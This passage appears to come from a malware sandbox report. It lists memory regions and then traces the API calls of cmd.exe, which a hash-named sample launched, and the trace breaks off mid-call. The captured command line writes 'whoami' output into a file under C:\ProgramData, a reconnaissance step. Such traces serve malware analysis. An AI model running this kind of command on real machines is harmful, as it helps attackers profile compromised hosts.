start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6165 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6166 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 6167 start_va = 0x700000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 6168 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6169 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6170 start_va = 0x850000 end_va = 0xb86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 428 os_tid = 0x1180 [0231.765] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0231.766] __set_app_type (_Type=0x1) [0231.766] __p__fmode () returned 0x74974d6c [0231.766] __p__commode () returned 0x74975b1c [0231.766] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0231.766] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0231.766] GetCurrentThreadId () returned 0x1180 [0231.766] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1180) returned 0x78 [0231.767] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0231.767] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0231.767] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.771] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.771] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0231.772] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.772] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.772] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.772] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.772] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.772] GetConsoleOutputCP () returned 0x1b5 [0231.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0231.773] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0231.773] _get_osfhandle (_FileHandle=1) returned 0x180 [0231.774] SetConsoleMode (hConsoleHandle=0x180, dwMode=0x0) returned 0 [0231.774] _get_osfhandle (_FileHandle=1) returned 0x180 [0231.774] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0231.774] _get_osfhandle (_FileHandle=0) returned 0x17c [0231.774] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0231.774] GetEnvironmentStringsW () returned 0x447fe8* [0231.774] GetProcessHeap () returned 0x440000 [0231.774] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa1a) returned 0x448a10 [0231.774] FreeEnvironmentStringsA (penv="A") returned 1 [0231.774] GetProcessHeap () returned 0x440000 [0231.774] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0x447e70 [0231.774] GetEnvironmentStringsW () returned 0x447fe8* [0231.775] GetProcessHeap () returned 0x440000 [0231.775] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa1a) returned 0x449438 [0231.775] FreeEnvironmentStringsA (penv="A") returned 1 [0231.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0231.775] RegCloseKey (hKey=0x88) returned 0x0 [0231.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0231.775] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0231.776] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.776] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0231.776] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.776] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.776] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0231.776] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0231.776] RegCloseKey (hKey=0x88) returned 0x0 [0231.776] time (in: timer=0x0 | out: timer=0x0) returned 0x62344256 [0231.776] srand (_Seed=0x62344256) [0231.776] GetCommandLineW () returned="cmd.exe /c \"whoami >>C:\\ProgramData\\keEeR.txt\"" [0231.776] GetCommandLineW () returned="cmd.exe /c \"whoami >>C:\\ProgramData\\keEeR.txt\"" [0231.776] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0231.776] GetProcessHeap () returned 0x440000 [0231.776] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x446fa0 [0231.776] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x446fa8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0231.776] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0231.777] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0231.777] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.777] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.777] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.777] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.777] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.777] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.777] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.777] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.777] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.777] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.777] GetProcessHeap () returned 0x440000 [0231.778] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x448a10) returned 1 [0231.778] GetEnvironmentStringsW () returned 0x447fe8* [0231.778] GetProcessHeap () returned 0x440000 [0231.778] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa32) returned 0x44a8a0 [0231.779] FreeEnvironmentStringsA (penv="A") returned 1 [0231.779] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0231.779] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.779] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.779] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.779] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.779] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.779] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.779] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.779] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.779] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.779] GetProcessHeap () returned 0x440000 [0231.779] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x44) returned 0x4471b8 [0231.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0231.779] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0231.779] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0231.780] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x447208 [0231.780] FindClose (in: hFindFile=0x447208 | out: hFindFile=0x447208) returned 1 [0231.780] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x447208 [0231.780] FindClose (in: hFindFile=0x447208 | out: hFindFile=0x447208) returned 1 [0231.780] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0231.780] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x447208 [0231.781] FindClose (in: hFindFile=0x447208 | out: hFindFile=0x447208) returned 1 [0231.781] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0231.781] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0231.781] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0231.781] GetProcessHeap () returned 0x440000 [0231.781] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44a8a0) returned 1 [0231.781] GetEnvironmentStringsW () returned 0x447fe8* [0231.781] GetProcessHeap () returned 0x440000 [0231.781] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa76) returned 0x449e60 [0231.782] FreeEnvironmentStringsA (penv="=") returned 1 [0231.782] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0231.782] GetProcessHeap () returned 0x440000 [0231.782] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4471b8) returned 1 [0231.783] GetProcessHeap () returned 0x440000 [0231.783] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400e) returned 0x44bd60 [0231.783] GetProcessHeap () returned 0x440000 [0231.783] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x4471b8 [0231.783] GetProcessHeap () returned 0x440000 [0231.783] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x44fd78 [0231.784] GetProcessHeap () returned 0x440000 [0231.784] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x453d88 [0231.784] GetProcessHeap () returned 0x440000 [0231.785] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44bd60) returned 1 [0231.785] GetConsoleOutputCP () returned 0x1b5 [0231.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0231.785] GetUserDefaultLCID () returned 0x409 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0231.786] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0231.786] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.788] GetProcessHeap () returned 0x440000 [0231.788] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x44a8e0 [0231.788] GetConsoleTitleW (in: lpConsoleTitle=0x44a8e0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0231.788] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0231.788] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0231.788] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0231.788] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0231.789] GetProcessHeap () returned 0x440000 [0231.789] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x44bd60 [0231.789] GetProcessHeap () returned 0x440000 [0231.789] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44bd60) returned 1 [0231.789] _wcsicmp (_String1="whoami", _String2=")") returned 78 [0231.790] _wcsicmp (_String1="FOR", _String2="whoami") returned -17 [0231.790] _wcsicmp (_String1="FOR/?", _String2="whoami") returned -17 [0231.790] _wcsicmp (_String1="IF", _String2="whoami") returned -14 [0231.790] _wcsicmp (_String1="IF/?", _String2="whoami") returned -14 [0231.790] _wcsicmp (_String1="REM", _String2="whoami") returned -5 [0231.790] _wcsicmp (_String1="REM/?", _String2="whoami") returned -5 [0231.790] GetProcessHeap () returned 0x440000 [0231.790] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x44aaf8 [0231.790] GetProcessHeap () returned 0x440000 [0231.790] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0x447928 [0231.790] GetProcessHeap () returned 0x440000 [0231.790] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xc) returned 0x447e98 [0231.790] GetProcessHeap () returned 0x440000 [0231.790] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x20) returned 0x447260 [0231.792] GetProcessHeap () returned 0x440000 [0231.792] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3a) returned 0x44ab58 [0231.793] GetProcessHeap () returned 0x440000 [0231.793] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x447808 [0231.793] _get_osfhandle (_FileHandle=1) returned 0x180 [0231.793] _get_osfhandle (_FileHandle=1) returned 0x180 [0231.793] _get_osfhandle (_FileHandle=1) returned 0x180 [0231.793] GetFileType (hFile=0x180) returned 0x2 [0231.793] GetStdHandle (nStdHandle=0xfffffff5) returned 0x180 [0231.793] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x19fc74 | out: lpMode=0x19fc74) returned 0 [0231.793] _dup (_FileHandle=1) returned 3 [0231.793] _close (_FileHandle=1) returned 0 [0231.794] _wcsicmp (_String1="C:\\ProgramData\\keEeR.txt", _String2="con") returned -53 [0231.794] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x19fc54, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.795] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x19fc54, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0231.795] _open_osfhandle (_OSFileHandle=0x180, _Flags=8) returned 1 [0231.795] _get_osfhandle (_FileHandle=1) returned 0x180 [0231.795] GetFileType (hFile=0x180) returned 0x1 [0231.795] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0231.795] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0231.796] _wcsicmp (_String1="whoami", _String2="DIR") returned 19 [0231.796] _wcsicmp (_String1="whoami", _String2="ERASE") returned 18 [0231.797] _wcsicmp (_String1="whoami", _String2="DEL") returned 19 [0231.797] _wcsicmp (_String1="whoami", _String2="TYPE") returned 3 [0231.797] _wcsicmp (_String1="whoami", _String2="COPY") returned 20 [0231.797] _wcsicmp (_String1="whoami", _String2="CD") returned 20 [0231.797] _wcsicmp (_String1="whoami", _String2="CHDIR") returned 20 [0231.797] _wcsicmp (_String1="whoami", _String2="RENAME") returned 5 [0231.797] _wcsicmp (_String1="whoami", _String2="REN") returned 5 [0231.797] _wcsicmp (_String1="whoami", _String2="ECHO") returned 18 [0231.797] _wcsicmp (_String1="whoami", _String2="SET") returned 4 [0231.797] _wcsicmp (_String1="whoami", _String2="PAUSE") returned 7 [0231.797] _wcsicmp (_String1="whoami", _String2="DATE") returned 19 [0231.797] _wcsicmp (_String1="whoami", _String2="TIME") returned 3 [0231.797] _wcsicmp (_String1="whoami", _String2="PROMPT") returned 7 [0231.797] _wcsicmp (_String1="whoami", _String2="MD") returned 10 [0231.797] _wcsicmp (_String1="whoami", _String2="MKDIR") returned 10 [0231.797] _wcsicmp (_String1="whoami", _String2="RD") returned 5 [0231.797] _wcsicmp (_String1="whoami", _String2="RMDIR") returned 5 [0231.797] _wcsicmp (_String1="whoami", _String2="PATH") returned 7 [0231.797] _wcsicmp (_String1="whoami", _String2="GOTO") returned 16 [0231.797] _wcsicmp (_String1="whoami", _String2="SHIFT") returned 4 [0231.797] _wcsicmp (_String1="whoami", _String2="CLS") returned 20 [0231.797] _wcsicmp (_String1="whoami", _String2="CALL") returned 20 [0231.797] _wcsicmp (_String1="whoami", _String2="VERIFY") returned 1 [0231.797] _wcsicmp (_String1="whoami", _String2="VER") returned 1 [0231.797] _wcsicmp (_String1="whoami", _String2="VOL") returned 1 [0231.797] _wcsicmp (_String1="whoami", _String2="EXIT") returned 18 [0231.797] _wcsicmp (_String1="whoami", _String2="SETLOCAL") returned 4 [0231.797] _wcsicmp (_String1="whoami", _String2="ENDLOCAL") returned 18 [0231.797] _wcsicmp (_String1="whoami", _String2="TITLE") returned 3 [0231.797] _wcsicmp (_String1="whoami", _String2="START") returned 4 [0231.798] _wcsicmp (_String1="whoami", _String2="DPATH") returned 19 [0231.798] _wcsicmp (_String1="whoami", _String2="KEYS") returned 12 [0231.798] _wcsicmp (_String1="whoami", _String2="MOVE") returned 10 [0231.798] _wcsicmp (_String1="whoami", _String2="PUSHD") returned 7 [0231.798] _wcsicmp (_String1="whoami", _String2="POPD") returned 7 [0231.798] _wcsicmp (_String1="whoami", _String2="ASSOC") returned 22 [0231.798] _wcsicmp (_String1="whoami", _String2="FTYPE") returned 17 [0231.798] _wcsicmp (_String1="whoami", _String2="BREAK") returned 21 [0231.798] _wcsicmp (_String1="whoami", _String2="COLOR") returned 20 [0231.798] _wcsicmp (_String1="whoami", _String2="MKLINK") returned 10 [0231.798] _wcsicmp (_String1="whoami", _String2="DIR") returned 19 [0231.798] _wcsicmp (_String1="whoami", _String2="ERASE") returned 18 [0231.798] _wcsicmp (_String1="whoami", _String2="DEL") returned 19 [0231.798] _wcsicmp (_String1="whoami", _String2="TYPE") returned 3 [0231.798] _wcsicmp (_String1="whoami", _String2="COPY") returned 20 [0231.798] _wcsicmp (_String1="whoami", _String2="CD") returned 20 [0231.798] _wcsicmp (_String1="whoami", _String2="CHDIR") returned 20 [0231.798] _wcsicmp (_String1="whoami", _String2="RENAME") returned 5 [0231.798] _wcsicmp (_String1="whoami", _String2="REN") returned 5 [0231.798] _wcsicmp (_String1="whoami", _String2="ECHO") returned 18 [0231.798] _wcsicmp (_String1="whoami", _String2="SET") returned 4 [0231.798] _wcsicmp (_String1="whoami", _String2="PAUSE") returned 7 [0231.798] _wcsicmp (_String1="whoami", _String2="DATE") returned 19 [0231.798] _wcsicmp (_String1="whoami", _String2="TIME") returned 3 [0231.798] _wcsicmp (_String1="whoami", _String2="PROMPT") returned 7 [0231.798] _wcsicmp (_String1="whoami", _String2="MD") returned 10 [0231.798] _wcsicmp (_String1="whoami", _String2="MKDIR") returned 10 [0231.798] _wcsicmp (_String1="whoami", _String2="RD") returned 5 [0231.798] _wcsicmp (_String1="whoami", _String2="RMDIR") returned 5 [0231.799] _wcsicmp 